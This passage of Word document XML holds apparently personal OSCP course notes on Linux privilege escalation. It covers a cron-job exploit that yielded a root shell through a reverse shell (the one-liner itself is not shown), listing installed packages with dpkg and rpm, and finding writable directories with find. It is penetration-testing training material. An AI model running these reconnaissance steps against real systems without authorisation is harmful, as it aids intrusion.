      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A93">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A94">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in the previous listing, the cron job did execute, as well as the reverse shell one-liner. We have successfully elevated our privileges and have access to a root shell on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A95">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although this was a simple example, it is not uncommon to find similar situations in the field since administrators are often more focused on pushing systems into production rather than securing script file permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A96">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A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98">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A99">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uj1wrxwdmh84" w:id="375"/>
      <w:bookmarkEnd w:id="375"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Installed Programs Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A9A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (18.1.2. Manual Enumeration) (Module 18 Linux Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A9B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A9C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A9D">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">At some point, we may need to leverage an exploit to escalate our local privileges. If so, our search for a working exploit begins with the enumeration of all installed applications, noting the version of each. We can use this information to search for a matching exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A9E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manually searching for this information could be very time consuming and ineffective, so we'll learn how to automate this process in the next section. However, we should know how to manually query installed packages as this is needed to corroborate information obtained during previous enumeration steps.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A9F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux-based systems use a variety of package managers. For example, Debian-based Linux distributions, like the one in our lab, use</w:t>
      </w:r>
      <w:hyperlink r:id="rId899">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId900">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">dpkg</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, while Red Hat-based systems use</w:t>
      </w:r>
      <w:hyperlink r:id="rId901">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId902">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">rpm</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To list applications installed by dpkg on our Debian system, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dpkg -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4308442" cy="4605338"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="501" name="image514.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image514.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId903"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4308442" cy="4605338"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1345"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dpkg -l </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This confirms what we expected earlier from enumerating listening ports: the Debian 10 machine is, in fact, running a web server. In this case, it is running Apache2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To look at a specific program (ex. To find the version of a specific program, you can do the following)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dpkg -l | grep &lt;program&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1217"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Debian</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AAB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rpm –qa | grep &lt;program&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1217"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On RPM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;program&gt; --version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;program&gt; -v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AAF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A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B1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e6o4a5hlp2je" w:id="376"/>
      <w:bookmarkEnd w:id="376"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure File Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AB2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP (18.1.2. Manual Enumeration) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Module 18 Linux Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AB3">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As we previously mentioned, files with insufficient access restrictions can create a vulnerability that may grant an attacker elevated privileges. This most often happens when an attacker can modify scripts or binary files that are executed under the context of a privileged account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AB4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sensitive files that are readable by an unprivileged user may also contain important information such as hard-coded credentials for a database or a service account running with higher privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AB5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since it is not feasible to manually check the permissions of each file and directory, we need to automate this task as much as possible. As a start, we can use</w:t>
      </w:r>
      <w:hyperlink r:id="rId904">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId905">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">find</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify files with insecure permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AB6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the example below, we are searching for every directory writable by the current user on the target system. We'll search the whole root directory (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) and use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-writable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> argument to specify the attribute we are interested in. We can also use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-type d</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to locate directories, and filter errors with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AB7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3336458" cy="4776788"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="561" name="image536.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image536.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId906"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3336458" cy="4776788"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="936"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -writable -type d 2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AB9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown above, several directories seem to be world-writable, including the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/joe/.scripts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory, which is the location of the cron script we found earlier. This certainly warrants further investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ABA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ABB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ABC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ABD">
      <w:pPr>
